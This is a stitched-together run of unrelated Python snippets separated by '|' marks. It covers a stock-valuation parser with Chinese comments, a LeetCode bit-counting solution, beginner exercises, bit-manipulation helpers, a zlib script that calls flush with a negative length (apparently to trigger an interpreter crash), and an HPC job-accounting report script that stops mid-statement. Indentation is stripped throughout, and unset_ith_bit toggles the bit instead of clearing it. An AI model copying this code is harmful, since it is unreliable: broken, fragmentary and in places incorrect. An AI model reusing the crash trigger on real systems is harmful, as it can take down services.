nameStr = data[symbol]['name'];
pe_ttm = round(float(data[symbol]['pe_ttm']),2);
pe_lyr = round(float(data[symbol]['pe_lyr']),2);
pb = round(float(data[symbol]['pb']),2);
totalShares = data[symbol]['totalShares'];
close = round(float(data[symbol]['close']),2);
eps = round(float(data[symbol]['eps']),2);
net_assets = float(data[symbol]['net_assets'])
if net_assets>0:
net_assets = round(float(data[symbol]['net_assets']),2);
else:
#每股净资产小于等于0时,调整
net_assets = 0.00001
#roe,不能直接从接口得到,可计算下得出(每股收益/每股净资产)
roe = round(float(eps)/net_assets*100,2)
#roe的最新算法 PE/PB = 1 + 1/ROE;ROE = PB/(PE-PB)
#进过我自己的认证,我觉得这个数据是比较合理的。上面的“每股收益仅仅是以当前季度的收益来计算,而下面这个则是过去一年来观察的”
roe2 = round(float(pb)/(float(pe_ttm)-float(pb))*100,2)
#购买推荐
buyPercent = round ( (-2*float(pb) + 5)/3 ,3);
buyNum = int(round ( industryPrice*buyPercent/float(close) ,0));
buyNum2 = int(round ( buyNum/100 ,0) * 100);
#是否停牌
#当交易量为非0的时候就认为是
myVolume = float(data[symbol]['volume'])
if myVolume==0:
halt = True
else:
halt = False
#数据库保存抓取的股票的时间
#这个时间是以其中一个不停牌的股票中的时间
global grabTime
if(grabTime==''):
#volume表示成交量,当为0的时候,就表示“停牌”了
if not halt:
grabTime = data[symbol]['time'];
#修改字符串中的数据(删除 '+0800 ')
grabTime = grabTime.replace('+0800 ','')
#转为时间戳
myTime = time.mktime( time.strptime(grabTime, "%a %b %d %H:%M:%S %Y") )
#格式化
timeObj = time.strptime(grabTime, "%a %b %d %H:%M:%S %Y")
tm_year = str(timeObj.tm_year)
tm_mon = str(timeObj.tm_mon)
tm_mday = str(timeObj.tm_mday)
myTimeStr = tm_year+'年'+tm_mon+'月'+tm_mday+'日'
#保存
#dataBase.saveTime(myTime,myTimeStr)
#print '======================= '+myTimeStr+' ======================='
return {
"pe_ttm":pe_ttm,
"pe_lyr":pe_lyr,
"pb":pb,
"totalShares":totalShares,
"totalShares2":round(int(totalShares)/100000000,1),
#新增几个
"buyPercent":buyPercent,
"buyNum":buyNum,
"buyNum2":buyNum2,
"close":close,
"halt":halt,
"eps":eps,
"net_assets":net_assets,#每股净资产
"roe":roe,
"roe2":roe2,
"nameStr":nameStr,
};
#获取所有处理完毕的数据
stockArr = getAllData();
#print(u'SUCCESS! 完成数据库存储');
#保存到文件
# fileName = exportFile.save(stockArr);
# print(u'SUCCESS! 完成txt导出');
#发送到目标邮箱
# with open(fileName, 'r') as myfile:
# data=myfile.read()
# myEmail.send(data)
# myfile.close();
#显示时间
#print dataBase.getTime()[0]['timeStr'];
#结束
#print(u'=== END ===');
|
class Solution(object):
def countPrimeSetBits(self, L, R):
"""
:type L: int
:type R: int
:rtype: int
"""
def bits(n, base, bit_arr):
if n != 0 and bit_arr[n] == 0:
while base > n:
base >>= 1
bit_arr[n] = bits((n - base), base, bit_arr) + 1
return bit_arr[n]
def is_prime(n):
return True if (n == 2 or
n == 3 or
n == 5 or
n == 7 or
n == 11 or
n == 13 or
n == 17 or
n == 19) else False
base = 1
while (base << 1) <= R:
base <<= 1
bit_arr = [0] * (R + 1)
bit_arr[0] = 0
bit_arr[1] = 1
ans = 0
for i in reversed(range(L, R + 1)):
if is_prime(bits(i, base, bit_arr)):
ans += 1
return ans
|
nome = str(input())
fixo = float(input())
venda = float(input())
print("TOTAL = R$ %.2f" % round((fixo+(0.15*venda)),4))
|
magician_names = ['David Blaine', 'Cris Angel', 'Houdini', 'Harry Potter', 'Wutan']
def great_magicians(magicians):
'''Function that modifies the string in a list'''
magicians[:] = ['The Great ' + magician for magician in magicians]
return magicians
def show_magicians(magicians):
'''Function that prints out all the elements in a list'''
for magician in magicians:
print('Please welcome to the stage ' + magician)
print('The orginal magicians list: ')
show_magicians(magician_names)
print('\nThe modified copy of magician names: ')
great_mags = great_magicians(magician_names[:])
show_magicians(great_mags)
print('\nThe original list one more time to prove that it wasnt modified: ')
show_magicians(magician_names) |
#!/usr/bin/python
import zlib
msg = """
Society in every state is a blessing, but government even in its best state is but a necessary evil
in its worst state an intolerable one; for when we suffer, or are exposed to the same miseries by a
government, which we might expect in a country without government, our calamities is heightened by
reflecting that we furnish the means by which we suffer! Government, like dress, is the badge of
lost innocence; the palaces of kings are built on the ruins of the bowers of paradise. For were
the impulses of conscience clear, uniform, and irresistibly obeyed, man would need no other
lawgiver; but that not being the case, he finds it necessary to surrender up a part of his property
to furnish means for the protection of the rest; and this he is induced to do by the same prudence which
in every other case advises him out of two evils to choose the least. Wherefore, security being the true
design and end of government, it unanswerably follows that whatever form thereof appears most likely to
ensure it to us, with the least expense and greatest benefit, is preferable to all others.
""" * 1024
compMsg = zlib.compress(msg)
bad = -2
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg, 1)
decompObj.flush(bad)
|
def is_odd_num(n):
return n & 1
# 13 = 1101 so bits are 3,2,1,0 first bit starts from zero
def is_ith_bit_set(n, i):
return (n >> i) & 1 or n & (1 << i)
def set_ith_bit(n, i):
return n | (1 << i)
def unset_ith_bit(n, i):
return n ^ (1 << i)
def check_number_is_power_of_2(n):
return (n &
(n - 1)) == 0
|
#!/bin/env python
# Accounting file parser, to answer questions such as:
# - What is the breakdown of usage between faculties?
# - What is the breakdown of usage between users?
# - What is the breakdown of usage between users within a faculty?
# Try and be python2 compatible
from __future__ import print_function
import argparse
import os
import re
import sys
import math
import sge
import datetime
import time
import pytz
from tabulate import tabulate
from functools import reduce
from dateutil.relativedelta import relativedelta
# Command line arguments
# ----------------------
parser = argparse.ArgumentParser(description='Report on accounting data')
# Filters
parser.add_argument('--dates', action='store', type=str, help="Date range in UTC to report on, format [DATE][-[DATE]] where DATE has format YYYY[MM[DD[HH[MM[SS]]]]] e.g. 2018 for that year, 2018-2019 for two years, -2018 for everything up to the start of 2018, 2018- for everything after the start of 2018, 201803 for March 2018, 201806-201905 for 12 months starting June 2018. Multiple ranges supported.")
parser.add_argument('--queues', action='append', type=str, help="Queue(s) to report on")
parser.add_argument('--skipqueues', action='append', type=str, help="Queue(s) to filter out")
parser.add_argument('--queuetypes', action='append', type=str, help="Queue type(s) to report on")
parser.add_argument('--skipqueuetypes', action='append', type=str, help="Queue type(s) to filter out")
parser.add_argument('--users', action='append', type=str, help="Users(s) to report on")
parser.add_argument('--skipusers', action='append', type=str, help="Users(s) to filter out")
parser.add_argument('--projects', action='append', type=str, help="Project(s) to report on")
parser.add_argument('--skipprojects', action='append', type=str, help="Project(s) to filter out")
parser.add_argument('--parents', action='append', type=str, help="Project parent(s) to report on")
parser.add_argument('--skipparents', action='append', type=str, help="Project parent(s) to filter out")
parser.add_argument('--apps', action='store', type=str, help="Application(s) to report on")
parser.add_argument('--skipapps', action='store', type=str, help="Application(s) to filter out")
parser.add_argument('--coreprojects', action='store_true', default=False, help="Report on the core set of projects")
parser.add_argument('--limitusers', action='store', type=int, default=sys.maxsize, help="Report on n most significant users")
# Data sources
parser.add_argument('--accountingfile', action='append', type=str, help="Read accounting data from file")
parser.add_argument('--services', action='store', type=str, help="Services we are reporting on")
parser.add_argument('--credfile', action='store', type=str, help="YAML credential file")
parser.add_argument('--cores', action='store', default=0, type=int, help="Total number of cores to calculate utilisation percentages from")
parser.add_argument('--reserved_is_user', action='store_true', default=False, help="In core hour availability, are reservations user time?")
parser.add_argument('--sizebins', action='append', type=str, help="Job size range to report statistics on, format [START][-[END]]. Multiple ranges supported.")
parser.add_argument('--noadjust', action='store_true', default=False, help="Do not adjust core hours to account for memory utilisation")
parser.add_argument('--nocommas', action='store_true', default=False, help="Do not add thousand separators in tables")
parser.add_argument('--printrecords', action='store_true', default=False, help="Print records to standard out")
parser.add_argument('--reports', action='append', type=str, help="What information to report on (all, parents, projects, users, projectbyusers, totalsbydate, parentsbydate, projectsbydate, usersbydate)")
parser.add_argument('--byyear', action='store_true', default=False, help="Report date ranges, year by year")
parser.add_argument('--bymonth', action='store_true', default=False, help="Report date ranges, month by month")
parser.add_argument('--byapp', action='store_true', default=False, help="Report on applications, not users")
parser.add_argument('--byjob', action='store_true', default=False, help="Report on individual jobs")
parser.add_argument('--coprocstats', action='store_true', default=False, help="Add coproc statistics to reports")
parser.add_argument('--availstats', action='store_true', default=False, help="Add core hour availability statistics to reports")
parser.add_argument('--waitstats', action='store_true', default=False, help="Add wait statistics to reports")
parser.add_argument('--basicwaittime', action='store_true', default=False, help="Use simple wait time measure (time submit/start instead of submit/end)")
parser.add_argument('--cpuspercpu', action='store', default=1, type=int, help="Number of actual CPUs per CPU measured by the accounting data")
args = parser.parse_args()
# Prepare regexes
# ---------------
range_def = re.compile(r"^(\d+)?(-(\d+)?)?$")
datetime_def = re.compile(r"^(\d{4})(\d{2})?(\d{2})?(\d{2})?(\d{2})?(\d{2})?$")
project_def = re.compile(r"^([a-z]+_)?(\S+)")
# Init parameters
# ---------------
# Maximum date (YYYY[MM[DD[HH[MM[SS]]]]]) or number to report on
max_date = "40000101"
max_num = sys.maxsize -1
# Backup method of determining node memory per core (mpc), in absence of
# node_type in job record, from hostname
backup_node_mpc = [
{ 'regex': r"^d[8-9]s", 'mpc': sge.number("192G") // 40 }, # ARC4
{ 'regex': r"^d1[0-2]s", 'mpc': sge.number("192G") // 40 }, # ARC4
{ 'regex': r"^data", 'mpc': sge.number("192G") // 16 }, # ARC4
{ 'regex': r"^d8mem", 'mpc': sge.number("768G") // 40 }, # ARC4
{ 'regex': r"^db0[4-5]gpu", 'mpc': sge.number("192G") // 40 }, # ARC4
{ 'regex': r"^db12gpu[1-2]", 'mpc': sge.number("128G") // 24 }, # ARC3
{ 'regex': r"^db12gpu[3-9]", 'mpc': sge.number("256G") // 24 }, # ARC3
{ 'regex': r"^db12gpu1[0-2]", 'mpc': sge.number("256G") // 24 }, # ARC3
{ 'regex': r"^db12gpu13", 'mpc': sge.number("512G") // 24 }, # ARC3
{ 'regex': r"^db12phi", 'mpc': sge.number("112G") // 256 }, # ARC3
{ 'regex': r"^db12mem", 'mpc': sge.number("768G") // 24 }, # ARC3
{ 'regex': r"^h7s3b1[56]", 'mpc': sge.number("64G") // 24 }, # ARC2
{ 'regex': r"^h[12367]s", 'mpc': sge.number("24G") // 12 }, # ARC2
{ 'regex': r"^dc[1-4]s", 'mpc': sge.number("128G") // 24 }, # ARC3
{ 'regex': r"^c2s0b[0-3]n",'mpc': sge.number("24G") // 8 }, # ARC1
{ 'regex': r"^c[1-3]s", 'mpc': sge.number("12G") // 8 }, # ARC1
{ 'regex': r"^smp[1-4]", 'mpc': sge.number("128G") // 16 }, # ARC1
{ 'regex': r"^g8s([789]|10)n", 'mpc': sge.number("256G") // 16 }, # POLARIS
{ 'regex': r"^g[0-9]s", 'mpc': sge.number("64G") // 16 }, # POLARIS/ARC2
{ 'regex': r"^hb01s", 'mpc': sge.number("256G") // 20 }, # MARC1
{ 'regex': r"^hb02n", 'mpc': sge.number("3T") // 48 }, # MARC1
{ 'regex': r"^(comp|sky|env)", 'mpc': sge.number("2G") }, # EVEREST
{ 'regex': r"^vizcomp", 'mpc': sge.number("1G") }, # EVEREST
{ 'regex': r"^cloud", 'mpc': sge.number("4G") }, # EVEREST
]
# Compile regexes
for n in backup_node_mpc:
n['re'] = re.compile(n['regex'])
# Some jobs weren't allocated to a project and should have been: use the
# queue name to do this retrospectively
queue_project_mapping = {
'env1_sgpc.q': 'sgpc',
'env1_glomap.q': 'glomap',
'speme1.q': 'speme',
'env1_neiss.q': 'neiss',
'env1_tomcat.q': 'tomcat',
'chem1.q': 'chem',
'civ1.q': 'civil',
'mhd1.q': 'mhd',
'palaeo1.q': 'palaeo1',
}
# Parent of project mappings
# (if not in table, assumes project is own parent)
project_parent_regex = [
{ 'regex': r'^(Geography|Earth|Environment|minphys|glocat|glomap|tomcat|palaeo1|sgpc|neiss|CONSUMER)$', 'parent': 'ENV' },
{ 'regex': r'^(Computing|SPEME|MechEng|speme|civil)$', 'parent': 'ENG' },
{ 'regex': r'^(Maths|Physics|Maths|Chemistry|FoodScience|mhd|skyblue|chem|maths|astro|codita)$', 'parent': 'MAPS' },
{ 'regex': r'^(Biology|omics|cryoem)$', 'parent': 'FBS' },
{ 'regex': r'^(Medicine|MEDICAL)$', 'parent': 'MEDH' },
{ 'regex': r'^(N8HPC_DUR_|dur$)', 'parent': 'DUR' },
{ 'regex': r'^(N8HPC_LAN_|lan$)', 'parent': 'LAN' },
{ 'regex': r'^(N8HPC_LDS_|lds$)', 'parent': 'LDS' },
{ 'regex': r'^(N8HPC_LIV_|liv$)', 'parent': 'LIV' },
{ 'regex': r'^(N8HPC_MCR_|mcr$)', 'parent': 'MCR' },
{ 'regex': r'^(N8HPC_NCL_|ncl$)', 'parent': 'NCL' },
{ 'regex': r'^(N8HPC_SHE_|she$)', 'parent': 'SHE' },
{ 'regex': r'^(N8HPC_YRK_|yrk$)', 'parent': 'YRK' },
]
# Compile regexes
for n in project_parent_regex:
n['re'] = re.compile(n['regex'])
# Some projects have changed names, or combined with other
# projects over the years. Combine them by updating old names.
project_project_mapping = {
'ISS': 'ARC',
'NONE': 'ARC',
'admin': 'ARC',
'users': 'ARC',
'UKMHD': 'MAPS',
'NONMEDICAL': 'OTHER',
'EarthScience': 'Earth',
}
# Routines
# --------
def main():
# One date range for all time, if not specified
if not args.dates:
args.dates = [ '-' ]
# Turn dates arg into array
args.dates = commasep_list(args.dates)
if '-' in args.dates:
print("WARNING: no date specified, will be for all time")
if args.byyear or args.bymonth:
print("WARNING: byyear/bymonth specified, will be a lot of output")
# Parse date argument(s)
global dates
dates = parse_startend(commasep_list(args.dates))
if args.byyear: dates = splitdates(dates, 'year')
if args.bymonth: dates = splitdates(dates, 'month')
# Restrict to the core purchasers of ARC, if requested
if args.coreprojects:
args.projects = [ 'Arts', 'ENG', 'ENV', 'ESSL', 'FBS', 'LUBS', 'MAPS', 'MEDH', 'PVAC' ]
# Read default accounting file if none specified
if not args.accountingfile and not args.credfile:
args.accountingfile = [ os.environ["SGE_ROOT"] + "/" + os.environ["SGE_CELL"] + "/common/accounting" ]
# All reports, if not specified
if not args.reports:
if len(dates) > 1:
args.reports = [ 'totalsbydate', 'parentsbydate', 'projectsbydate', 'usersbydate' ]
else:
args.reports = [ 'parents', 'projects', 'users', 'projectbyusers' ]
# Job size bins, if not specified
if not args.sizebins:
args.sizebins = [ '1', '2-24', '25-48', '49-128', '129-256', '257-512', '513-10240' ]
# Allow comma separated values to indicate arrays
#DEBUG - would be better as a custom parseargs action
args.skipqueues = commasep_list(args.skipqueues)
args.queues = commasep_list(args.queues)
args.queuetypes = commasep_list(args.queuetypes)
args.skipqueuetypes = commasep_list(args.skipqueuetypes)
args.users = commasep_list(args.users)
args.skipusers = commasep_list(args.skipusers)
args.projects = commasep_list(args.projects)
args.skipprojects = commasep_list(args.skipprojects)
args.parents = commasep_list(args.parents)
args.skipparents = commasep_list(args.skipparents)
args.accountingfile = commasep_list(args.accountingfile)
args.reports = commasep_list(args.reports)
args.sizebins = commasep_list(args.sizebins)
args.services = commasep_list(args.services)
args.apps = commasep_list(args.apps)
args.skipapps = commasep_list(args.skipapps)
# Parse job size bins
sizebins = parse_startend(args.sizebins, type='int')
# Initialise our main data structure
data = [ { 'date': d, 'projusers': {}, 'users': {}, 'projects': {}, 'parents': {} } for d in dates]
# Collect raw data, split by project and user
# - raw accounting file data
if args.accountingfile:
for accounting in args.accountingfile:
print("reading from", accounting)
for record in sge.records(accounting=accounting, modify=record_modify):
for d in data:
if record_filter1(record, d['date']) and record_filter2(record, d['date']):
if args.byjob:
record['owner'] = record['owner'] \
+"("+ record['job'] \
+")"
process_raw(record, d['projusers'], sizebins)
# - raw database accounting data
if args.credfile:
# Open database connection
with open(args.credfile, 'r') as stream:
import yaml
import MySQLdb as mariadb
credentials = yaml.safe_load(stream)
db = mariadb.connect(**credentials)
fields = [
'qname',
'owner',
'project',
'maxvmem',
'start_time',
'end_time',
'ru_wallclock',
'category',
'job_number',
'task_number',
'slots',
'cpu',
'submission_time',
'hostname',
'coproc',
'coproc_cpu',
'coproc_max_mem',
'coproc_maxvmem',
'class_app',
'class_parallel',
'class_appsource',
]
for service in args.services:
print("reading database records for", service)
for d in data:
for record in sge.dbrecords(db, service, filter_spec=filter_spec(d['date']), fields=fields, modify=record_modify):
if record_filter2(record, d['date']):
if args.byapp:
record['owner'] = (record['class_app'] or 'unknown') \
+"("+ (record['class_parallel'] or 'unknown') \
+"/"+ (record['class_appsource'] or 'unknown') \
+")"
if args.byjob:
record['owner'] = record['owner'] \
+"("+ record['job'] \
+")"
process_raw(record, d['projusers'], sizebins)
# Create summary info for projects and users
for d in data:
# Store info derived from date range
##DEBUG - figure out what to do here when range is for all time
d['date']['hours'] = (d['date']['end'] - d['date']['start'])/float(3600)
# Initialise
if 'core_hours' not in d['date']: d['date']['core_hours'] = 0.0
if 'max_core_hours' not in d['date']: d['date']['max_core_hours'] = 0.0
# Find total number of possible core hours
if args.cores > 0:
d['date']['core_hours'] = d['date']['hours'] * args.cores
d['date']['max_core_hours'] = d['date']['core_hours']
elif args.credfile:
# NOTE: assumes there's no significant loss of coverage of
# host availability data in the database.
for service in args.services:
avail = sge.dbavail(db, service, d['date']['start'], d['date']['end'], args.queues, args.skipqueues)
if args.reserved_is_user:
d['date']['core_hours'] += float(avail['avail'] or 0) /float(3600)
else:
d['date']['core_hours'] += float(avail['avail_usrrsv'] or 0) /float(3600)
d['date']['max_core_hours'] += float(avail['total'] or 0) /float(3600)
# Aggregate info for each user
for project in d['projusers']:
for user in d['projusers'][project]:
if user not in d['users']:
d['users'][user] = {
'jobs': 0,
'core_hours': 0,
'core_hours_adj': 0,
'cpu_hours': 0,
'mem_hours': 0,
'mem_req_hours': 0,
'wait_hours': 0,
'wall_hours': 0,
'wall_req_hours': 0,
'coproc_hours': 0,
'coproc_req_hours': 0,
'coproc_mem_hours': 0,
'coproc_mem_req_hours': 0,
'job_size': [0 for b in sizebins],
}
d['users'][user]['jobs'] += d['projusers'][project][user]['jobs']
d['users'][user]['core_hours'] += d['projusers'][project][user]['core_hours']
d['users'][user]['core_hours_adj'] += d['projusers'][project][user]['core_hours_adj']
d['users'][user]['cpu_hours'] += d['projusers'][project][user]['cpu_hours']
d['users'][user]['mem_hours'] += d['projusers'][project][user]['mem_hours']
d['users'][user]['mem_req_hours'] += d['projusers'][project][user]['mem_req_hours']
d['users'][user]['wait_hours'] += d['projusers'][project][user]['wait_hours']
d['users'][user]['wall_hours'] += d['projusers'][project][user]['wall_hours']
d['users'][user]['wall_req_hours'] += d['projusers'][project][user]['wall_req_hours']
d['users'][user]['coproc_hours'] += d['projusers'][project][user]['coproc_hours']
d['users'][user]['coproc_req_hours'] += d['projusers'][project][user]['coproc_req_hours']
d['users'][user]['coproc_mem_hours'] += d['projusers'][project][user]['coproc_mem_hours']
d['users'][user]['coproc_mem_req_hours'] += d['projusers'][project][user]['coproc_mem_req_hours']
for (i, b) in enumerate(sizebins):
d['users'][user]['job_size'][i] += d['projusers'][project][user]['job_size'][i]
# Aggregate info for each project
for project, dat in d['projusers'].items():
d['projects'][project] = {
'users': 0,
'jobs': 0,
'core_hours': 0,
'core_hours_adj': 0,
'cpu_hours': 0,
'mem_hours': 0,
'mem_req_hours': 0,
'wait_hours': 0,
'wall_hours': 0,
'wall_req_hours': 0,
'coproc_hours': 0,
'coproc_req_hours': 0,
'coproc_mem_hours': 0,
'coproc_mem_req_hours': 0,
'job_size': [0 for b in sizebins],
}
for user in dat.values():
d['projects'][project]['users'] += 1
d['projects'][project]['jobs'] += user['jobs']
d['projects'][project]['core_hours'] += user['core_hours']
d['projects'][project]['core_hours_adj'] += user['core_hours_adj']
d['projects'][project]['cpu_hours'] += user['cpu_hours']
d['projects'][project]['mem_hours'] += user['mem_hours']
d['projects'][project]['mem_req_hours'] += user['mem_req_hours']
d['projects'][project]['wait_hours'] += user['wait_hours']
d['projects'][project]['wall_hours'] += user['wall_hours']
d['projects'][project]['wall_req_hours'] += user['wall_req_hours']
d['projects'][project]['coproc_hours'] += user['coproc_hours']
d['projects'][project]['coproc_req_hours'] += user['coproc_req_hours']
d['projects'][project]['coproc_mem_hours'] += user['coproc_mem_hours']
d['projects'][project]['coproc_mem_req_hours'] += user['coproc_mem_req_hours']
for (i, b) in enumerate(sizebins):
d['projects'][project]['job_size'][i] += user['job_size'][i]
# Aggregate info for each parent
for project, dat in d['projects'].items():
parent = project_to_parent(project)
if parent not in d['parents']:
d['parents'][parent] = {
'users': 0,
'jobs': 0,
'core_hours': 0,
'core_hours_adj': 0,
'cpu_hours': 0,
'mem_hours': 0,
'mem_req_hours': 0,
'wait_hours': 0,
'wall_hours': 0,
'wall_req_hours': 0,
'coproc_hours': 0,
'coproc_req_hours': 0,
'coproc_mem_hours': 0,
'coproc_mem_req_hours': 0,
'job_size': [0 for b in sizebins],
}
d['parents'][parent]['users'] += d['projects'][project]['users'] ##DEBUG not strictly true (double-counts users in multiple projects covered by same parent)
d['parents'][parent]['jobs'] += d['projects'][project]['jobs']
d['parents'][parent]['core_hours'] += d['projects'][project]['core_hours']
d['parents'][parent]['core_hours_adj'] += d['projects'][project]['core_hours_adj']
d['parents'][parent]['cpu_hours'] += d['projects'][project]['cpu_hours']
d['parents'][parent]['mem_hours'] += d['projects'][project]['mem_hours']
d['parents'][parent]['mem_req_hours'] += d['projects'][project]['mem_req_hours']
d['parents'][parent]['wait_hours'] += d['projects'][project]['wait_hours']
d['parents'][parent]['wall_hours'] += d['projects'][project]['wall_hours']
d['parents'][parent]['wall_req_hours'] += d['projects'][project]['wall_req_hours']
d['parents'][parent]['coproc_hours'] += d['projects'][project]['coproc_hours']
d['parents'][parent]['coproc_req_hours'] += d['projects'][project]['coproc_req_hours']
d['parents'][parent]['coproc_mem_hours'] += d['projects'][project]['coproc_mem_hours']
d['parents'][parent]['coproc_mem_req_hours'] += d['projects'][project]['coproc_mem_req_hours']
for (i, b) in enumerate(sizebins):
d['parents'][parent]['job_size'][i] += d['projects'][project]['job_size'][i]
# Spit out answer
print_summary(data, args.reports, sizebins)
# Return main data structure, in case we using this interactively
return(data)
def process_raw(record, projusers, sizebins):
user = record['owner']
project = record['project']
if args.printrecords: print(record)
# Init data
if project not in projusers:
projusers[project] = {}
if user not in projusers[project]:
projusers[project][user] = {
'jobs': 0,
'core_hours': 0,
'core_hours_adj': 0,
'cpu_hours': 0,
'mem_hours': 0,
'mem_req_hours': 0,
'wait_hours': 0,
'wall_hours': 0,
'wall_req_hours': 0,
'coproc_hours': 0,
'coproc_req_hours': 0,
'coproc_mem_hours': 0,
'coproc_mem_req_hours': 0,
'job_size': [0 for b in sizebins],
}
# Record usage
# - count jobs
projusers[project][user]['jobs'] += 1
# - count blocked core hours
projusers[project][user]['core_hours'] += record['core_hours']
projusers[project][user]['core_hours_adj'] += record['core_hours_adj']
# - count used core hours
projusers[project][user]['cpu_hours'] += record['cpu'] / float(3600)
# - count used and blocked memory
projusers[project][user]['mem_hours'] += record['core_hours'] * record['maxvmem']
projusers[project][user]['mem_req_hours'] += record['core_hours'] * record['mem_req']
# - count wait time
if args.basicwaittime:
projusers[project][user]['wait_hours'] += max((record['start_time'] - record['submission_time']) / float(3600), 0)
else:
projusers[project][user]['wait_hours'] += max((record['end_time'] - record['submission_time']) / float(3600), 0)
# - count wallclock time
projusers[project][user]['wall_hours'] += record['ru_wallclock'] / float(3600)
projusers[project][user]['wall_req_hours'] += sge.category_resource(record['category'], 'h_rt') / float(3600)
# - coproc usage
# (unavailable if not using database)
if 'coproc' in record:
projusers[project][user]['coproc_hours'] += record['coproc_cpu'] / float(3600)
projusers[project][user]['coproc_req_hours'] += record['coproc'] * record['ru_wallclock'] / float(3600)
projusers[project][user]['coproc_mem_hours'] += record['ru_wallclock'] * record['coproc_maxvmem']
projusers[project][user]['coproc_mem_req_hours'] += record['ru_wallclock'] * record['coproc_max_mem']
# - job size distribution
for (i, b) in enumerate(sizebins):
if record['job_size_adj'] >= b['start'] and record['job_size_adj'] < b['end']:
projusers[project][user]['job_size'][i] += record['core_hours_adj']
# Filtering replaced by filter_spec
def record_filter1(record, date):
# - Time filtering
if record['end_time'] < date['start'] or record['end_time'] >= date['end']: return False
# - Queue filtering
if args.skipqueues and record['qname'] in args.skipqueues: return False
if args.queues and record['qname'] not in args.queues: return False
# - User filtering
if args.skipusers and record['owner'] in args.skipusers: return False
if args.users and record['owner'] not in args.users: return False
return True
# Filtering that cannot be replaced by filter_spec
def record_filter2(record, date):
# - Project filtering
if args.skipprojects and record['project'] in args.skipprojects: return False
if args.projects and record['project'] not in args.projects: return False
# - Project parent filtering
if args.skipparents and record['parent'] in args.skipparents: return False
if args.parents and record['parent'] not in args.parents: return False
# - Application filtering
if args.skipapps and record['class_app'] in args.skipapps: return False
if args.apps and record['class_app'] not in args.apps: return False
return True
# Return filter specification usable by sge.dbrecord
def filter_spec(date):
f = []
# - Time filtering
f.append({'end_time': { '>=': (date['start'],) }})
f.append({'end_time': { '<': (date['end'],) }})
# - Queue filtering
if args.skipqueues: f.append({'qname': { '!=': args.skipqueues }})
if args.queues: f.append({'qname': { '=': args.queues }})
# - User filtering
if args.skipusers: f.append({'owner': { '!=': args.skipusers }})
if args.users: f.append({'owner': { '=': args.users }})
#record_modify must be called before this can happen
# # - Project filtering
# if args.skipprojects: f.append({'project': { '!=': args.skipprojects }})
# if args.projects: f.append({'project': { '=': args.projects }})
# # - Project parent filtering
# if args.skipparents: f.append({'parent': { '!=': args.skipparents }})
# if args.parents: f.append({'parent': { '=': args.parents }})
return f
def record_modify(record):
# Tweak project
r = project_def.match(record['project'])
if r:
project = r.group(2)
# - queue to project mapping
if record['qname'] in queue_project_mapping:
project = queue_project_mapping[record['qname']]
# - project to project mapping (name changes, mergers, etc.)
if project in project_project_mapping:
project = project_project_mapping[project]
else:
project = '<unknown>'
record['project'] = project
# Add project parent
record['parent'] = project_to_parent(project)
# Name the record
record['job'] = str(record['job_number']) + "." + str(record['task_number'] or 1)
# Add size and core hour figures
if args.noadjust:
size_adj = float(1)
else:
size_adj = return_size_adj(record)
record['job_size'] = record['slots'] * args.cpuspercpu
record['job_size_adj'] = record['job_size'] * size_adj
record['core_hours'] = record['ru_wallclock'] * record['job_size'] / float(3600)
record['core_hours_adj'] = record['ru_wallclock'] * record['job_size_adj'] / float(3600)
# Add memory requested figure
record['mem_req'] = record['slots'] * sge.category_resource(record['category'], 'h_vmem')
# Calculate effective job size multiplier
def return_size_adj(record):
# - obtain node memory per core
mem_core = None
nt = sge.category_resource(record['category'], 'node_type')
if nt:
cores = sge.number(sge.node_type(nt, 'num_pe'))
memory = sge.number(sge.node_type(nt, 'memory'))
if cores and memory:
mem_core = memory // cores
# - backup method of figuring out node memory per core
if not mem_core:
# Cycle through node name regexs for a match
for b in backup_node_mpc:
r = b['re'].match(record['hostname'])
if r:
mem_core = b['mpc']
break
# - obtain memory request
mem_req = sge.category_resource(record['category'], 'h_vmem')
if mem_req:
mem_req = sge.number(mem_req)
size_adj = float(1)
if mem_req is not None and mem_core is not None:
#size_adj = math.ceil(mem_req / float(mem_core))
size_adj = max(1, mem_req / float(mem_core))
else:
print("Warning: could not extract mem or mem per node details for", record['job'],"("+record['category']+")", file=sys.stderr)
return size_adj
def summarise_totalsbydate(data, bins):
headers = [ 'Date', 'Parents', 'Projects', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
avail_core_hours = sum([d['date']['core_hours'] for d in data])
max_core_hours = sum([d['date']['max_core_hours'] for d in data])
total_cpu_hours = 0
total_mem_hours = 0
total_mem_req_hours = 0
total_wait_hours = 0
total_wall_hours = 0
total_wall_req_hours = 0
total_coproc_hours = 0
total_coproc_req_hours = 0
total_coproc_mem_hours = 0
total_coproc_mem_req_hours = 0
table = []
for d in data:
core_hours_adj = sum([d['projects'][p]['core_hours_adj'] for p in d['projects']])
cpu_hours = sum([d['projects'][p]['cpu_hours'] for p in d['projects']])
total_cpu_hours += cpu_hours
mem_hours = sum([d['projects'][p]['mem_hours'] for p in d['projects']])
total_mem_hours += mem_hours
mem_req_hours = sum([d['projects'][p]['mem_req_hours'] for p in d['projects']])
total_mem_req_hours += mem_req_hours
wait_hours = sum([d['projects'][p]['wait_hours'] for p in d['projects']])
total_wait_hours += wait_hours
wall_hours = sum([d['projects'][p]['wall_hours'] for p in d['projects']])
total_wall_hours += wall_hours
wall_req_hours = sum([d['projects'][p]['wall_req_hours'] for p in d['projects']])
total_wall_req_hours += wall_req_hours
coproc_hours = sum([d['projects'][p]['coproc_hours'] for p in d['projects']])
total_coproc_hours += coproc_hours
coproc_req_hours = sum([d['projects'][p]['coproc_req_hours'] for p in d['projects']])
total_coproc_req_hours += coproc_req_hours
coproc_mem_hours = sum([d['projects'][p]['coproc_mem_hours'] for p in d['projects']])
total_coproc_mem_hours += coproc_mem_hours
coproc_mem_req_hours = sum([d['projects'][p]['coproc_mem_req_hours'] for p in d['projects']])
total_coproc_mem_req_hours += coproc_mem_req_hours
table.append({
'Date': d['date']['name'],
'Parents': len({project_to_parent(p) for p in d['projects']}),
'Projects': len(d['projects']),
'Users': len(d['users']),
'Jobs': sum([d['projects'][p]['jobs'] for p in d['projects']]),
'Core Hrs': sum([d['projects'][p]['core_hours'] for p in d['projects']]),
